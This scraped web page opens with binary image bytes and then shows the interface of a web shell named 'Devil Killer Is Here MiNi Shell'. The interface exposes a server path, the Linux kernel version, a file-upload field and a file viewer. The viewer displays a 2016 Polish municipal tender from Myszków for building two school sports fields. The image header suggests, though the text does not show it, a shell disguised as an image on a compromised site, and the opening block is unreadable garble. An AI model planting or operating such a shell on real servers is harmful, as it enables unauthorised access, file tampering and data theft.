JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20161011/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20161011/320951-N-2016.html

<div class="divRow_xforms"><div>
              Ogłoszenie nr 320951 - 2016
              z dnia 2016-10-11 r.
            </div><div class="headerMedium_xforms" style="text-align: center">Myszków: Budowa boisk wielofunkcyjnych - w formule zaprojektuj i wybuduj
Część nr 1:
Budowa boiska wielofunkcyjnego o nawierzchni poliuretanowej na terenie placu szkolnego przy ul. Jedwabnej. 
Część nr 2:
Budowa boiska wielofunkcyjnego przy Zespole Szkół Publicznych nr 2.
<br />
            OGŁOSZENIE O ZAMÓWIENIU -
            
              Roboty budowlane
            </div><div><b>Zamieszczanie ogłoszenia:</b>
              obowiązkowe
            </div><div><b>Ogłoszenie dotyczy:</b>
              zamówienia publicznego
            </div><div><b>Zamówienie dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><br /><b>Nazwa projektu lub programu</b><br /></div><div><b>O zamówienie mogą ubiegać się wyłącznie zakłady pracy chronionej oraz wykonawcy, których działalność, lub działalność ich wyodrębnionych organizacyjnie jednostek, które będą realizowały zamówienie, obejmuje  społeczną i zawodową integrację osób będących członkami grup społecznie marginalizowanych </b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Należy podać minimalny procentowy wskaźnik zatrudnienia osób należących do jednej lub więcej kategorii, o których mowa w art. 22 ust. 2 ustawy Pzp, nie mniejszy niż 30%, osób zatrudnionych przez zakłady pracy chronionej lub wykonawców albo ich jednostki (w %)
            <br /></div><div class="headerLarge_xforms" style="text-align: left"><u>SEKCJA I: ZAMAWIAJĄCY</u></div><div style="padding-left: 20px"><b>Postępowanie przeprowadza centralny zamawiający </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Postępowanie przeprowadza podmiot, któremu zamawiający powierzył/powierzyli przeprowadzenie postępowania </b><br /><div style="padding-left: 20px">
                nie
              </div><b>Informacje na temat podmiotu któremu zamawiający powierzył/powierzyli prowadzenie postępowania:</b><br /><b>Postępowanie jest przeprowadzane wspólnie przez zamawiających</b><br /><div style="padding-left: 20px">
                nie
              </div><br />
            Jeżeli tak, należy wymienić zamawiających, którzy wspólnie przeprowadzają postępowanie oraz podać adresy ich siedzib, krajowe numery identyfikacyjne oraz osoby do kontaktów wraz z danymi do kontaktów:
            <br /><br /><b>Postępowanie jest przeprowadzane wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej </b><br /><div style="padding-left: 20px">
                nie
              </div><b>W przypadku przeprowadzania postępowania wspólnie z zamawiającymi z innych państw członkowskich Unii Europejskiej  mające zastosowanie krajowe prawo zamówień publicznych:</b><br /><b>Informacje dodatkowe:</b><br /></div><div style="padding-left: 20px;"><div style="text-align: left"><b>I. 1) NAZWA I ADRES: </b>Gmina Myszków, krajowy numer identyfikacyjny
              151398497, ul.
              Kościuszki 
              26,
              42-300 
              Myszków, woj.
              śląskie, państwo
              , tel.
              (34)3132682, e-mail
              zamowieniapubliczne@miastomyszkow.pl, faks
              (34)3135029.
              <br />
              Adres strony internetowej (URL): www.bip.miastomyszkow.pl<br /><br /></div><div style="text-align: left"><b>I. 2) RODZAJ ZAMAWIAJĄCEGO: </b>
                Administracja samorządowa
              </div><div style="text-align: left"><b>
                I.3) WSPÓLNE UDZIELANIE ZAMÓWIENIA <i>(jeżeli dotyczy)</i>:
              </b><div style="padding-left: 20px">
                Podział obowiązków między zamawiającymi w przypadku wspólnego przeprowadzania postępowania, w tym
                w przypadku wspólnego przeprowadzania postępowania z zamawiającymi z innych państw członkowskich Unii Europejskiej (który z zamawiających jest odpowiedzialny za przeprowadzenie postępowania, czy i w jakim zakresie za przeprowadzenie postępowania odpowiadają pozostali zamawiający, czy zamówienie będzie udzielane przez każdego z zamawiających indywidualnie, czy zamówienie zostanie udzielone w imieniu i na rzecz pozostałych zamawiających):
                <br /></div></div><div style="text-align: left"><b>
                I.4) KOMUNIKACJA:
              </b><br /><b>Nieograniczony, pełny i bezpośredni dostęp do dokumentów z postępowania można uzyskać pod adresem (URL)</b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Adres strony internetowej, na której zamieszczona będzie specyfikacja istotnych warunków zamówienia </b><div style="padding-left: 20px">
                  tak
                <br />www.bip.miastomyszkow.pl</div><br /><b>Dostęp do dokumentów z postępowania jest ograniczony - więcej informacji można uzyskać pod adresem </b><div style="padding-left: 20px">
                  nie
                <br /></div><br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu należy przesyłać:</b><br /><b>Elektronicznie</b><div style="padding-left: 20px">
                  nie
                <br />
                adres
                <br /></div><br /><div style="padding-left: 20px"><b>Dopuszczone jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  nie
                <br /><b>Wymagane jest przesłanie ofert lub wniosków o dopuszczenie do udziału w postępowaniu w inny sposób:</b><br />
                  tak
                  <br />
                  Inny sposób:
                  <br />pisemnie<br />
                Adres:
                <br />Sekretariat Burmistrza Miasta Myszkowa (pokój nr 109)  w budynku Urzędu Miasta Myszkowa, przy ul. Kościuszki 26, 42-300 Myszków</div><br /><b>Komunikacja elektroniczna wymaga korzystania z narzędzi i urządzeń lub formatów plików, które nie są ogólnie dostępne</b><div style="padding-left: 20px">
                  nie
                <br />
                Nieograniczony, pełny, bezpośredni i bezpłatny dostęp do tych narzędzi można uzyskać pod adresem: (URL)
                <br /></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA II: PRZEDMIOT ZAMÓWIENIA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><br /><b>II.1) Nazwa nadana zamówieniu przez zamawiającego: </b>Budowa boisk wielofunkcyjnych - w formule zaprojektuj i wybuduj
Część nr 1:
Budowa boiska wielofunkcyjnego o nawierzchni poliuretanowej na terenie placu szkolnego przy ul. Jedwabnej. 
Część nr 2:
Budowa boiska wielofunkcyjnego przy Zespole Szkół Publicznych nr 2.
<br /><b>Numer referencyjny: </b>ZP.271.47.2016.JG<br /><b>Przed wszczęciem postępowania o udzielenie zamówienia przeprowadzono dialog techniczny </b><br /><div style="padding-left: 20px; text-align: justify">
                  nie
                </div><br /><b>II.2) Rodzaj zamówienia: </b>
                roboty budowlane
              <br /><b>II.3) Informacja o możliwości składania ofert częściowych</b><br />
              Zamówienie podzielone jest na części:
              <br /><div style="padding-left: 20px">
                  Tak
                  <br /><b>Oferty lub wnioski o dopuszczenie do udziału w postępowaniu można składać w odniesieniu do:</b><br />
                    wszystkich części
                  <br /></div><br /><br /><b>
                II.4) Krótki opis przedmiotu zamówienia
              </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań )</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:
              </b>1.	Przedmiotem zamówienia jest wykonanie w formule zaprojektuj i wybuduj dwóch zadań inwestycyjnych o nazwach:
1)	Budowa boiska wielofunkcyjnego o nawierzchni poliuretanowej na terenie placu szkolnego przy ul. Jedwabnej, 
2)	Budowa boiska wielofunkcyjnego przy Zespole Szkół Publicznych nr 2,
zwanym dalej w skrócie budową boisk wielofunkcyjnych  w formule zaprojektuj
i wybuduj.
2.	Rodzaj zamówienia: roboty budowlane.
3.	Zamawiający przewiduje możliwość składania ofert częściowych przez Wykonawców.
4.	W celu umożliwienia składania ofert częściowych przedmiot zamówienia został podzielony na dwie części: 
1)	Budowa boiska wielofunkcyjnego o nawierzchni poliuretanowej na terenie placu szkolnego przy ul. Jedwabnej, 
2)	Budowa boiska wielofunkcyjnego przy Zespole Szkół Publicznych nr 2.
5.	Wykonawca może złożyć oferty częściowe na jedną lub dwie części zamówienia, przy czym na daną część zamówienia może złożyć tylko jedną ofertę.
6.	Opis przedmiotu zamówienia dla części 1:
Przedmiotem zamówienia, w ramach budżetu partycypacyjnego, w formule zaprojektuj i wybuduj jest wykonanie prac projektowych i robót budowlanych, polegających na wybudowaniu (częściowo) ogrodzonego boiska do gry w siatkówkę o nawierzchni poliuretanowej wraz z jego wyposażeniem, budową komunikacji i elementów małej architektury.
Dla ww. zakresu robót budowlanych Wykonawca winien opracować niezbędną dokumentację projektową oraz uzyskać wymagane uzgodnienia i pozwolenia. 
Dokumentacja projektowa powinna zostać opracowana zgodnie z:
­	Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 
25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 poz. 462 z późn. zm.),
­	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego 
(jednolity tekst Dz. U. z Dz. U. z 2013 poz. 1129), 
­	Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120 z 2003r., poz. 1126) i innymi obowiązującymi przepisami. 
Przy projektowaniu i budowie boiska należy bezwzględnie zaplanować rozmieszczenie linii przy uwzględnieniu wymaganych stref bezpieczeństwa. Przedmiot zamówienia bezwzględnie należy dostosować do potrzeb wszystkich użytkowników, w tym zapewnić dostępność obiektu dla osób niepełnosprawnych (brak barier architektonicznych 
w postaci krawężników, obrzeży itp.). W koncepcji planu zagospodarowania  załącznik nr 3/pfu zaproponowano, aby komunikację o szerokości ok. 2m, dla zapewnienia dostępności obiektu dla osób niepełnosprawnych, połączyć z projektowanym w ramach termomodernizacji szkoły układem komunikacyjnym. 
Zakres zadań będących przedmiotem zamówienia obejmuje:
1)	Budowę boiska do gry w siatkówkę o nawierzchni na bazie żywic poliuretanowych do gry w siatkówkę o powierzchni ok. 360 m2 wraz z wyposażeniem;
2)	Wykonanie ogrodzenia o długości ok. 61,50 mb o wysokości czterech metrów;
3)	Budowę komunikacji  ok. 3,70 m2;
4)	Wykonanie prac agrotechnicznych:
a)	wyrównanie przyległego terenu,
b)	zasianie trawy.
Zakres planowanych prac projektowych:
1)	Uzyskanie mapy dla celów opiniodawczych,
2)	Uzyskanie oświadczeń, opinii, uzgodnień i innych dokumentów, niezbędnych do wykonania dokumentacji projektowej,
3)	Opracowanie dokumentacji projektowej w zakresie niezbędnym do zgłoszenia budowy w Starostwie Powiatowym w Myszkowie,
4)	Skuteczne zgłoszenie budowy w Starostwie Powiatowym w Myszkowie, 
tj. niewniesienie sprzeciwu w ustawowym terminie przez organ przyjmujący zgłoszenie,
5)	Uzupełnienie dokumentacji projektowej i opracowanie STWiOR w zakresie niezbędnym do zrealizowania zadania inwestycyjnego, tj. wynikającym z programu funkcjonalno-użytkowego, 
6)	Wykonanie dokumentacji powykonawczej  w tym inwentaryzacji geodezyjnej powykonawczej i dokumentacji budowlanej powykonawczej.
Zakres planowanych robót budowlanych:
1)	Roboty ziemne:
a)	korytowanie pod podbudowę nawierzchni,
b)	wykopy pod słupy ogrodzenia boiska,
c)	wykopy pod fundamenty urządzeń sportowych,
d)	wywóz i utylizacja odpadów oraz nadmiaru ziemi,
2)	Niwelacja terenu, usunięcie karpin,
3)	Wykonanie robót budowlanych na podstawie sporządzonej i zatwierdzonej dokumentacji projektowej,
4)	Wybudowanie boiska do gry w siatkówkę o nawierzchni poliuretanowej, 
5)	Wykonanie ogrodzenia boiska z trzech stron, 
6)	Wyposażenie boiska w urządzenia niezbędne dla jego obsługi,
7)	Wykonanie zagospodarowania terenu:
a)	komunikacji w celu połączenia obiektu z planowanymi w ramach termomodernizacji ciągami komunikacyjnymi, 
b)	elementów małej architektury, 
8)	Prace agrotechniczne i ukształtowanie terenu:
a)	wyrównanie przyległego terenu, 
b)	zasianie trawy,
9)	Utylizacja materiałów rozbiórkowych i innych odpadów z terenu budowy. 
Szczegółowy zakres przedmiotu zamówienia określony został w programie funkcjonalno
 użytkowym stanowiącym załącznik nr 1 do SIWZ.
7.	Opis przedmiotu zamówienia dla części 2:
Przedmiotem zamówienia, w ramach budżetu partycypacyjnego, w formule zaprojektuj i wybuduj jest wykonanie prac projektowych i robót budowlanych, polegających na wybudowaniu boiska wielofunkcyjnego o nawierzchni poliuretanowej w miejscu istniejącego boiska do gry w koszykówkę o nawierzchni asfaltowej. 
Dla ww. zakresu robót budowlanych Wykonawca winien opracować niezbędną dokumentację projektową oraz uzyskać wymagane uzgodnienia i pozwolenia. 
Dokumentacja projektowa powinna zostać opracowana zgodnie z:
­	Rozporządzeniem Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 
25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012 poz. 462 z późn. zm.),
­	Rozporządzeniem Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego 
(jednolity tekst Dz. U. z  2013r., poz. 1129), 
­	Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia oraz planu bezpieczeństwa i ochrony zdrowia (Dz. U. Nr 120 z 2003r., poz. 1126) i innymi obowiązującymi przepisami.
Przedmiot zamówienia bezwzględnie należy dostosować do potrzeb wszystkich użytkowników, w tym zapewnić dostępność obiektu dla osób niepełnosprawnych (brak barier architektonicznych w postaci krawężników, obrzeży itp.)
Zakres zadań będących przedmiotem zamówienia obejmuje:
Budowę boiska wielofunkcyjnego o nawierzchni poliuretanowej o wymiarach 15x28m bez wyposażenia;
Zakres planowanych prac projektowych:
1)	Uzyskanie mapy dla celów opiniodawczych,
2)	Uzyskanie oświadczeń, opinii, uzgodnień i innych dokumentów, niezbędnych do wykonania dokumentacji projektowej,
3)	Opracowanie dokumentacji projektowej w zakresie niezbędnym do zgłoszenia wykonywania robót w Starostwie Powiatowym w Myszkowie,
4)	Skuteczne zgłoszenie wykonywania robót w Starostwie Powiatowym w Myszkowie, 
tj. niewniesienie sprzeciwu w ustawowym terminie przez organ przyjmujący zgłoszenie,
5)	Uzupełnienie dokumentacji projektowej i opracowanie STWiOR w zakresie niezbędnym do zrealizowania zadania inwestycyjnego , tj. wynikającym  z programu funkcjonalno-użytkowego. 
Zakres planowanych robót budowlanych:
1)	rozbiórka istniejącej nawierzchni asfaltowej i podbudowy tłuczniowej boiska do koszykówki na powierzchni ok. 420m2 (precyzyjne cięcie piłą wykonywane na całym obwodzie istniejącego boiska do gry w piłkę koszykową).
2)	wyznaczenie położenia obiektu,
3)	zabezpieczenie placu budowy,
4)	zabezpieczenie krawędzi istniejącej nawierzchni asfaltowej w miejscu planowanego połączenia z nawierzchnią poliuretanową i ewentualna ich naprawa w przypadku uszkodzenia krawędzi przy prowadzeniu robót budowlanych polegających na korytowaniu pod warstwy konstrukcyjne nawierzchni poliuretanowej;
5)	korytowanie pod warstwy konstrukcyjne nowej nawierzchni poliuretanowej boiska wielofunkcyjnego,
6)	wykonanie warstwy filtracyjnej z piasku i podbudowy tłuczniowej o gr. ok. 35cm,
7)	wykonanie podłoża pod nawierzchnię poliuretanową z podkładu mineralno  syntetycznego o gr. ok. 35mm,
8)	wykonanie nawierzchni poliuretanowej składającej się z pośredniej, nośnej warstwy elastycznej o gr. ok. 11mm i zewnętrznej warstwy użytkowej o gr. ok. 2mm,
9)	wykonanie drenażu francuskiego (kruszywo zabezpieczone geowłókniną) na odcinku od południowo  wschodniego narożnika boiska w kierunku pasa zieleni przylegającego do południowej części boiska (ok. 15mb), 
10)	rozbiórka i odtworzenie nawierzchni asfaltowej w miejscu przebiegu drenażu francuskiego na długości ok. 15mb,
11)	 wykonanie na terenie zieleni przylegającym do południowej części boiska zbiornika z kręgów betonowych fi 1200 i głębokości 120cm z górną płytą żelbetową 
i przekryciem włazem betonowym, z podłączeniem do studni drenażu francuskiego,
12)	utylizacja materiałów rozbiórkowych i innych odpadów z terenu budowy.
Szczegółowy zakres przedmiotu zamówienia określony został w programie funkcjonalno 
 użytkowym stanowiącym załącznik nr 2 do SIWZ.
<br /><br /><b>II.5) Główny kod CPV: </b>45212220-4<br /><br /><b>
                II.6) Całkowita wartość zamówienia </b><i>(jeżeli zamawiający podaje informacje o wartości zamówienia)</i>:
              
              <br />
              Wartość bez VAT:
              <br />
              Waluta:
              <br /><div style="padding-left: 20px"><br /><i>(w przypadku umów ramowych lub dynamicznego systemu zakupów  szacunkowa całkowita maksymalna wartość w całym okresie obowiązywania umowy ramowej lub dynamicznego systemu zakupów)</i></div><br /><b>
                II.7)
                Czy przewiduje się udzielenie zamówień, o których mowa w art. 67 ust. 1 pkt 6 i 7  lub w art. 134 ust. 6 pkt 3  ustawy Pzp:
              </b>
                nie
              <br /><b>II.8) Okres, w którym realizowane będzie zamówienie lub okres, na który została zawarta umowa ramowa lub okres, na który został ustanowiony dynamiczny system zakupów:</b><div style="padding-left: 20px">
                    data zakończenia: 16/12/2016<br /></div><br /><b>II.9) Informacje dodatkowe: </b></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>
                III.1) WARUNKI UDZIAŁU W POSTĘPOWANIU
              </b><br /><div style="padding-left: 20px"><b>III.1.1) Kompetencje lub uprawnienia do prowadzenia określonej działalności zawodowej, o ile wynika to z odrębnych przepisów</b><br />
                Określenie warunków:
                <br />
                Informacje dodatkowe
                <br /><b>III.1.2)  Sytuacja finansowa lub ekonomiczna  </b><br />
                Określenie warunków:
                Wykonawca posiada środki finansowe lub zdolność kredytową w kwocie:
­	nie mniejszej niż 80 000,00 zł, przy składaniu oferty na jedną część zamówienia,
­	nie mniejszej niż 160 000,00 zł, przy składaniu oferty na dwie części zamówienia;
<br />
                Informacje dodatkowe
                <br /><b>III.1.3) Zdolność techniczna lub zawodowa </b><br />
                Określenie warunków:
                a)	Wykonawca wykonał należycie, zgodnie z przepisami prawa budowlanego 
i prawidłowo ukończył, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 1 boisko sportowe o nawierzchni poliuretanowej, 
b)	Wykonawca dysponuje co najmniej:
­	projektantem posiadającym uprawnienia do projektowania bez ograniczeń w specjalności architektonicznej,
­	kierownikiem robót budowlanych posiadającym uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń lub 
w ograniczonym zakresie w specjalności konstrukcyjno-budowlanej,
­	3 osobami wykonującymi bezpośrednio prace przy realizacji zamówienia, posiadającymi doświadczenie w wykonaniu co najmniej 1 boiska sportowego o nawierzchni poliuretanowej, w okresie ostatnich 5 lat.
W przypadku złożenia przez Wykonawcę oferty na część nr 1 i część nr 2 zamówienia, na potwierdzenie spełniania warunków udziału w postępowaniu, określonych w ust. 2 pkt 2 lit b, Zamawiający wymaga dla każdej części zamówienia odrębnego wykazania przez Wykonawcę dysponowania potencjałem technicznym 
i osobami zdolnymi do wykonania zamówienia w odniesieniu do 3 osób wykonujących bezpośrednio prace przy realizacji zamówienia, posiadających doświadczenie w wykonaniu co najmniej 1 boiska sportowego o nawierzchni poliuretanowej w okresie ostatnich 5 lat.
Natomiast w przypadku projektanta posiadającego uprawnienia do projektowania bez ograniczeń w specjalności architektonicznej i kierownika robót budowlanych posiadającego uprawnienia budowlane do kierowania robotami budowlanymi bez ograniczeń lub w ograniczonym zakresie w specjalności konstrukcyjno-budowlanej, Zamawiający dopuszcza wykazanie przez Wykonawcę dysponowanie tymi samym osobami zdolnymi do wykonania zamówienia na potwierdzenie spełniania warunku udziału w postępowaniu.
Za równoważne uprawnieniom budowlanym bez ograniczeń uważa się odpowiadające im merytoryką i zakresem ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów niż ustawa z dnia 7 lipca 1994 r. Prawo budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409 z późn. zm.) oraz Rozporządzenia Ministra Infrastruktury i Rozwoju z dnia 11 września 2014r. w  sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2014r., poz. 1278 z późn. zm.).
<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  tak
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 2 ustawy Pzp)
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 4 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, 
w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp;
Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt 1, składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające , że nie otwarto jego likwidacji ani nie ogłoszono upadłości  wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)	wykaz robót budowlanych  wykonanych w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju, dat wykonania i podmiotów,
na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, zgodnie 
z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, 
o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, 
